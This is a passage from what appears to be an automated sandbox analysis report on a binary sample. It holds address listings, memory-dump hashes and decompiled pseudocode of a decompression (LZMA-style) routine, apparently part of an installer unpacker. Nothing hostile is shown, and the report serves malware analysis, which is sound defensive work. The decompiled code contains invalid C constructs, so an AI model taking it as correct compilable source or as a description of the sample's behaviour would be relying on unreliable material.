                    0x00406dbf
                    0x00406dc2
                    0x00406dc4
                    0x00406dc5
                    0x00406dc8
                    0x00000000
                    0x00406dc8
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00407068
                    0x0040706c
                    0x0040708f
                    0x00407092
                    0x00407095
                    0x0040709f
                    0x0040706e
                    0x0040706e
                    0x00407071
                    0x00407074
                    0x00407077
                    0x00407084
                    0x00407087
                    0x00407087
                    0x004073cb
                    0x004073cb
                    0x004073cb
                    0x00000000
                    0x004073cb
                    0x00000000
                    0x004070ab
                    0x004070af
                    0x00000000
                    0x00000000
                    0x004070b5
                    0x004070b9
                    0x00000000
                    0x00000000
                    0x004070bf
                    0x004070c1
                    0x004070c5
                    0x004070c5
                    0x004070c8
                    0x004070cc
                    0x00000000
                    0x00000000
                    0x0040711c
                    0x00407120
                    0x00407127
                    0x0040712a
                    0x0040712d
                    0x00407137
                    0x004073cb
                    0x004073cb
                    0x004073cb
                    0x00000000
                    0x004073cb
                    0x004073cb
                    0x00407122
                    0x00000000
                    0x00000000
                    0x00407143
                    0x00407147
                    0x0040714e
                    0x00407151
                    0x00407154
                    0x00407149
                    0x00407149
                    0x00407149
                    0x00407157
                    0x0040715a
                    0x0040715d
                    0x0040715d
                    0x00407160
                    0x00407163
                    0x00407166
                    0x00407166
                    0x00407169
                    0x00407170
                    0x00407175
                    0x00000000
                    0x00000000
                    0x00407203
                    0x00407203
                    0x00407207
                    0x004075a5
                    0x00000000
                    0x004075a5
                    0x0040720d
                    0x00407210
                    0x00407213
                    0x00407217
                    0x0040721a
                    0x00407220
                    0x00407222
                    0x00407222
                    0x00407222
                    0x00407225
                    0x00407228
                    0x00000000
                    0x00000000
                    0x00406df8
                    0x00406df8
                    0x00406dfc
                    0x00407569
                    0x00000000
                    0x00407569
                    0x00406e02
                    0x00406e05
                    0x00406e08
                    0x00406e0c
                    0x00406e0f
                    0x00406e15
                    0x00406e17
                    0x00406e17
                    0x00406e17
                    0x00406e1a
                    0x00406e1d
                    0x00406e1d
                    0x00406e20
                    0x00406e23
                    0x00000000
                    0x00000000
                    0x00406e29
                    0x00406e2f
                    0x00000000
                    0x00000000
                    0x00406e35
                    0x00406e35
                    0x00406e39
                    0x00406e3c
                    0x00406e3f
                    0x00406e42
                    0x00406e45
                    0x00406e46
                    0x00406e49
                    0x00406e4b
                    0x00406e51
                    0x00406e54
                    0x00406e57
                    0x00406e5a
                    0x00406e5d
                    0x00406e60
                    0x00406e63
                    0x00406e7f
                    0x00406e82
                    0x00406e85
                    0x00406e88
                    0x00406e8f
                    0x00406e93
                    0x00406e95
                    0x00406e99
                    0x00406e65
                    0x00406e65
                    0x00406e69
                    0x00406e71
                    0x00406e76
                    0x00406e78
                    0x00406e7a
                    0x00406e7a
                    0x00406e9c
                    0x00406ea3
                    0x00406ea6
                    0x00000000
                    0x00406eac
                    0x00000000
                    0x00406eac
                    0x00000000
                    0x00406eb1
                    0x00406eb1
                    0x00406eb5
                    0x00407575
                    0x00000000
                    0x00407575
                    0x00406ebb
                    0x00406ebe
                    0x00406ec1
                    0x00406ec5
                    0x00406ec8
                    0x00406ece
                    0x00406ed0
                    0x00406ed0
                    0x00406ed0
                    0x00406ed3
                    0x00406ed6
                    0x00406ed6
                    0x00406ed6
                    0x00406edc
                    0x00000000
                    0x00000000
                    0x00406ede
                    0x00406ee1
                    0x00406ee4
                    0x00406ee7
                    0x00406eea
                    0x00406eed
                    0x00406ef0
                    0x00406ef3
                    0x00406ef6
                    0x00406ef9
                    0x00406efc
                    0x00406f14
                    0x00406f17
                    0x00406f1a
                    0x00406f1d
                    0x00406f1d
                    0x00406f20
                    0x00406f24
                    0x00406f26
                    0x00406efe
                    0x00406efe
                    0x00406f06
                    0x00406f0b
                    0x00406f0d
                    0x00406f0f
                    0x00406f0f
                    0x00406f29
                    0x00406f30
                    0x00406f33
                    0x00000000
                    0x00406f35
                    0x00000000
                    0x00406f35
                    0x00406f33
                    0x00406f3a
                    0x00406f3a
                    0x00406f3a
                    0x00406f3a
                    0x00000000
                    0x00000000
                    0x00406f75
                    0x00406f75
                    0x00406f79
                    0x00407581
                    0x00000000
                    0x00407581
                    0x00406f7f
                    0x00406f82
                    0x00406f85
                    0x00406f89
                    0x00406f8c
                    0x00406f92
                    0x00406f94
                    0x00406f94
                    0x00406f94
                    0x00406f97
                    0x00406f9a
                    0x00406f9a
                    0x00406fa0
                    0x00406f3e
                    0x00406f3e
                    0x00406f41
                    0x00000000
                    0x00406f41
                    0x00406fa2
                    0x00406fa2
                    0x00406fa5
                    0x00406fa8
                    0x00406fab
                    0x00406fae
                    0x00406fb1
                    0x00406fb4
                    0x00406fb7
                    0x00406fba
                    0x00406fbd
                    0x00406fc0
                    0x00406fd8
                    0x00406fdb
                    0x00406fde
                    0x00406fe1
                    0x00406fe1
                    0x00406fe4
                    0x00406fe8
                    0x00406fea
                    0x00406fc2
                    0x00406fc2
                    0x00406fca
                    0x00406fcf
                    0x00406fd1
                    0x00406fd3
                    0x00406fd3
                    0x00406fed
                    0x00406ff4
                    0x00406ff7
                    0x00000000
                    0x00406ff9
                    0x00000000
                    0x00406ff9
                    0x00000000
                    0x00407286
                    0x00407286
                    0x0040728a
                    0x004075b1
                    0x00000000
                    0x004075b1
                    0x00407290
                    0x00407293
                    0x00407296
                    0x0040729a
                    0x0040729d
                    0x004072a3
                    0x004072a5
                    0x004072a5
                    0x004072a5
                    0x004072a8
                    0x00000000
                    0x00000000
                    0x00407056
                    0x00407056
                    0x00407059
                    0x004073cb
                    0x004073cb
                    0x004073cb
                    0x00000000
                    0x004073cb
                    0x00000000
                    0x00407395
                    0x00407399
                    0x004073bb
                    0x004073be
                    0x004073c8
                    0x004073cb
                    0x004073cb
                    0x004073cb
                    0x00000000
                    0x004073cb
                    0x004073cb
                    0x0040739b
                    0x0040739e
                    0x004073a2
                    0x004073a5
                    0x004073a5
                    0x004073a8
                    0x00000000
                    0x00000000
                    0x00407452
                    0x00407456
                    0x00407474
                    0x00407474
                    0x00407474
                    0x0040747b
                    0x00407482
                    0x00407489
                    0x00407489
                    0x00000000
                    0x00407489
                    0x00407458
                    0x0040745b
                    0x0040745e
                    0x00407461
                    0x00407468
                    0x004073ac
                    0x004073ac
                    0x004073af
                    0x00000000
                    0x00000000
                    0x00407543
                    0x00407546
                    0x00407447
                    0x00000000
                    0x00000000
                    0x0040717d
                    0x0040717f
                    0x00407186
                    0x00407187
                    0x00407189
                    0x0040718c
                    0x00000000
                    0x00000000
                    0x00407194
                    0x00407197
                    0x0040719a
                    0x0040719c
                    0x0040719e
                    0x0040719e
                    0x0040719f
                    0x004071a2
                    0x004071a9
                    0x004071ac
                    0x004071ba
                    0x00000000
                    0x00000000
                    0x00407490
                    0x00407490
                    0x00407493
                    0x0040749a
                    0x00000000
                    0x00000000
                    0x0040749f
                    0x0040749f
                    0x004074a3
                    0x004075db
                    0x00000000
                    0x004075db
                    0x004074a9
                    0x004074ac
                    0x004074af
                    0x004074b3
                    0x004074b6
                    0x004074bc
                    0x004074be
                    0x004074be
                    0x004074be
                    0x004074c1
                    0x004074c4
                    0x004074c4
                    0x004074c4
                    0x004074c4
                    0x004074c7
                    0x004074c7
                    0x004074cb
                    0x0040752b
                    0x0040752e
                    0x00407533
                    0x00407534
                    0x00407536
                    0x00407538
                    0x0040753b
                    0x00407447
                    0x00407447
                    0x00000000
                    0x0040744d
                    0x00407447
                    0x004074cd
                    0x004074d3
                    0x004074d6
                    0x004074d9
                    0x004074dc
                    0x004074df
                    0x004074e2
                    0x004074e5
                    0x004074e8
                    0x004074eb
                    0x004074ee
                    0x00407507
                    0x0040750a
                    0x0040750d
                    0x00407510
                    0x00407514
                    0x00407516
                    0x00407516
                    0x00407517
                    0x0040751a
                    0x004074f0
                    0x004074f0
                    0x004074f8
                    0x004074fd
                    0x004074ff
                    0x00407502
                    0x00407502
                    0x0040751d
                    0x00407524
                    0x00000000
                    0x00407526
                    0x00000000
                    0x00407526
                    0x00000000
                    0x004071c2
                    0x004071c5
                    0x004071fb
                    0x0040732b
                    0x0040732b
                    0x0040732b
                    0x0040732b
                    0x0040732e
                    0x0040732e
                    0x00407331
                    0x00407333
                    0x004075bd
                    0x00000000
                    0x004075bd
                    0x00407339
                    0x0040733c
                    0x00000000
                    0x00000000
                    0x00407342
                    0x00407346
                    0x00407349
                    0x00407349
                    0x00407349
                    0x00000000
                    0x00407349
                    0x004071c7
                    0x004071c9
                    0x004071cb
                    0x004071cd
                    0x004071d0
                    0x004071d1
                    0x004071d3
                    0x004071d5
                    0x004071d8
                    0x004071db
                    0x004071f1
                    0x004071f6
                    0x0040722e
                    0x0040722e
                    0x00407232
                    0x0040725e
                    0x00407260
                    0x00407267
                    0x0040726a
                    0x0040726d
                    0x0040726d
                    0x00407272
                    0x00407272
                    0x00407274
                    0x00407277
                    0x0040727e
                    0x00407281
                    0x004072ae
                    0x004072ae
                    0x004072b1
                    0x004072b4
                    0x00407328
                    0x00407328
                    0x00407328
                    0x00000000
                    0x00407328
                    0x004072b6
                    0x004072bc
                    0x004072bf
                    0x004072c2
                    0x004072c5
                    0x004072c8
                    0x004072cb
                    0x004072ce
                    0x004072d1
                    0x004072d4
                    0x004072d7
                    0x004072f0
                    0x004072f2
                    0x004072f5
                    0x004072f6
                    0x004072f9
                    0x004072fb
                    0x004072fe
                    0x00407300
                    0x00407302
                    0x00407305
                    0x00407307
                    0x0040730a
                    0x0040730e
                    0x00407310
                    0x00407310
                    0x00407311
                    0x00407314
                    0x00407317
                    0x004072d9
                    0x004072d9
                    0x004072e1
                    0x004072e6
                    0x004072e8
                    0x004072eb
                    0x004072eb
                    0x0040731a
                    0x00407321
                    0x004072ab
                    0x004072ab
                    0x004072ab
                    0x004072ab
                    0x00000000
                    0x00407323
                    0x00000000
                    0x00407323
                    0x00407321
                    0x00407234
                    0x00407237
                    0x00407239
                    0x0040723c
                    0x0040723f
                    0x00407242
                    0x00407244
                    0x00407247
                    0x0040724a
                    0x0040724a
                    0x0040724d
                    0x0040724d
                    0x00407250
                    0x00407257
                    0x0040722b
                    0x0040722b
                    0x0040722b
                    0x0040722b
                    0x00000000
                    0x00407259
                    0x00000000
                    0x00407259
                    0x00407257
                    0x004071dd
                    0x004071e0
                    0x004071e2
                    0x004071e5
                    0x00000000
                    0x00000000
                    0x00406f44
                    0x00406f44
                    0x00406f48
                    0x0040758d
                    0x00000000
                    0x0040758d
                    0x00406f4e
                    0x00406f51
                    0x00406f54
                    0x00406f57
                    0x00406f5a
                    0x00406f5d
                    0x00406f60
                    0x00406f62
                    0x00406f65
                    0x00406f68
                    0x00406f6b
                    0x00406f6d
                    0x00406f6d
                    0x00406f6d
                    0x00000000
                    0x00000000
                    0x004070cf
                    0x004070cf
                    0x004070d3
                    0x00407599
                    0x00000000
                    0x00407599
                    0x004070d9
                    0x004070dc
                    0x004070df
                    0x004070e2
                    0x004070e4
                    0x004070e4
                    0x004070e4
                    0x004070e7
                    0x004070ea
                    0x004070ed
                    0x004070f0
                    0x004070f3
                    0x004070f6
                    0x004070f7
                    0x004070f9
                    0x004070f9
                    0x004070f9
                    0x004070fc
                    0x004070ff
                    0x00407102
                    0x00407105
                    0x00407105
                    0x00407105
                    0x00407108
                    0x0040710a
                    0x0040710a
                    0x00000000
                    0x00000000
                    0x0040734c
                    0x0040734c
                    0x0040734c
                    0x00407350
                    0x00000000
                    0x00000000
                    0x00407356
                    0x00407359
                    0x0040735c
                    0x0040735f
                    0x00407361
                    0x00407361
                    0x00407361
                    0x00407364
                    0x00407367
                    0x0040736a
                    0x0040736d
                    0x00407370
                    0x00407373
                    0x00407374
                    0x00407376
                    0x00407376
                    0x00407376
                    0x00407379
                    0x0040737c
                    0x0040737f
                    0x00407382
                    0x00407385
                    0x00407389
                    0x0040738b
                    0x0040738e
                    0x00000000
                    0x00407390
                    0x0040710d
                    0x0040710d
                    0x00000000
                    0x0040710d
                    0x0040738e
                    0x004075c3
                    0x00000000
                    0x00000000
                    0x00406bf2
                    0x004075fa
                    0x004075fa
                    0x00000000
                    0x004075fa
                    0x00407447
                    0x004073ce
                    0x004073cb
                    0x00000000
                    0x00407002

                    Memory Dump Source
                    • Source File: 00000000.00000002.313574929.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.313568294.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313589092.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313596922.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313755126.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.313755126.000000000047B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_PhviZrlpkW.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 7ccf24f4e081119859c9f0e48baaaa1d38e3934f3a3b1d8a87677b84cb71901f
                    • Instruction ID: 4a3513360c1d1cc4287bdabe5afcaa460628bed3c0d7ae87261646ca99be8a9f
                    • Opcode Fuzzy Hash: 7ccf24f4e081119859c9f0e48baaaa1d38e3934f3a3b1d8a87677b84cb71901f
                    • Instruction Fuzzy Hash: 0D711271D04228DBEF28CF98C9947ADBBF1FB44305F14806AD856B7280D738A986DF05
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040711C Relevance: 5.2, APIs: 4, Instructions: 170COMMON
                    Download Yara Rule
                    C-Code - Quality: 98%
                    			E0040711C() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xb;
						_t606 =  *(_t613 - 4) + 0x1c8 +  *(_t613 - 0x38) * 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x28);
						L88:
						 *(__ebp - 0x2c) = __eax;
						 *(__ebp - 0x28) =  *(__ebp - 0x2c);
						L89:
						__eax =  *(__ebp - 4);
						 *(__ebp - 0x80) = 0x15;
						__eax =  *(__ebp - 4) + 0xa68;
						 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
						L69:
						 *(__ebp - 0x84) = 0x12;
						while(1) {
							L132:
							 *(_t613 - 0x54) = _t606;
							while(1) {
								L133:
								_t531 =  *_t606;
								_t589 = _t531 & 0x0000ffff;
								_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
								if( *(_t613 - 0xc) >= _t565) {
									 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
									 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
									 *(_t613 - 0x40) = 1;
									_t532 = _t531 - (_t531 >> 5);
									 *_t606 = _t532;
								} else {
									 *(_t613 - 0x10) = _t565;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									 *_t606 = (0x800 - _t589 >> 5) + _t531;
								}
								if( *(_t613 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t613 - 0x6c) == 0) {
									 *(_t613 - 0x88) = 5;
									L170:
									_t568 = 0x22;
									memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
								 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
								 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
								 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
								L139:
								_t533 =  *(_t613 - 0x84);
								while(1) {
									 *(_t613 - 0x88) = _t533;
									while(1) {
										L1:
										_t534 =  *(_t613 - 0x88);
										if(_t534 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t534 * 4 +  &M00407602))) {
											case 0:
												if( *(_t613 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t534 =  *( *(_t613 - 0x70));
												if(_t534 > 0xe1) {
													goto L171;
												}
												_t538 = _t534 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t570);
												_push(9);
												_pop(_t571);
												_t609 = _t538 / _t570;
												_t540 = _t538 % _t570 & 0x000000ff;
												asm("cdq");
												_t604 = _t540 % _t571 & 0x000000ff;
												 *(_t613 - 0x3c) = _t604;
												 *(_t613 - 0x1c) = (1 << _t609) - 1;
												 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
												_t612 = (0x300 << _t604 + _t609) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
													L10:
													if(_t612 == 0) {
														L12:
														 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
														 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t612 = _t612 - 1;
														 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
													} while (_t612 != 0);
													goto L12;
												}
												if( *(_t613 - 4) != 0) {
													GlobalFree( *(_t613 - 4));
												}
												_t534 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t613 - 4) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 1;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t45 = _t613 - 0x48;
												 *_t45 =  *(_t613 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t613 - 0x48) < 4) {
													goto L13;
												}
												_t546 =  *(_t613 - 0x40);
												if(_t546 ==  *(_t613 - 0x74)) {
													L20:
													 *(_t613 - 0x48) = 5;
													 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t613 - 0x74) = _t546;
												if( *(_t613 - 8) != 0) {
													GlobalFree( *(_t613 - 8));
												}
												_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
												 *(_t613 - 8) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
												 *(_t613 - 0x84) = 6;
												 *(_t613 - 0x4c) = _t553;
												_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
												L132:
												 *(_t613 - 0x54) = _t606;
												goto L133;
											case 3:
												L21:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 3;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												_t67 = _t613 - 0x70;
												 *_t67 =  &(( *(_t613 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
												L23:
												 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
												if( *(_t613 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t531 =  *_t606;
												_t589 = _t531 & 0x0000ffff;
												_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
												if( *(_t613 - 0xc) >= _t565) {
													 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
													 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
													 *(_t613 - 0x40) = 1;
													_t532 = _t531 - (_t531 >> 5);
													 *_t606 = _t532;
												} else {
													 *(_t613 - 0x10) = _t565;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													 *_t606 = (0x800 - _t589 >> 5) + _t531;
												}
												if( *(_t613 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												__eflags =  *(__ebp - 0x40) - 1;
												if( *(__ebp - 0x40) != 1) {
													__eax =  *(__ebp - 0x24);
													 *(__ebp - 0x80) = 0x16;
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x28);
													 *(__ebp - 0x24) =  *(__ebp - 0x28);
													__eax =  *(__ebp - 0x2c);
													 *(__ebp - 0x28) =  *(__ebp - 0x2c);
													__eax = 0;
													__eflags =  *(__ebp - 0x38) - 7;
													0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
													__al = __al & 0x000000fd;
													__eax = (__eflags >= 0) - 1 + 0xa;
													 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x664;
													__eflags = __eax;
													 *(__ebp - 0x58) = __eax;
													goto L69;
												}
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 8;
												__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t259 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t259;
												0 | _t259 = _t259 + _t259 + 9;
												 *(__ebp - 0x38) = _t259 + _t259 + 9;
												goto L76;
											case 0xa:
												goto L0;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												goto L88;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
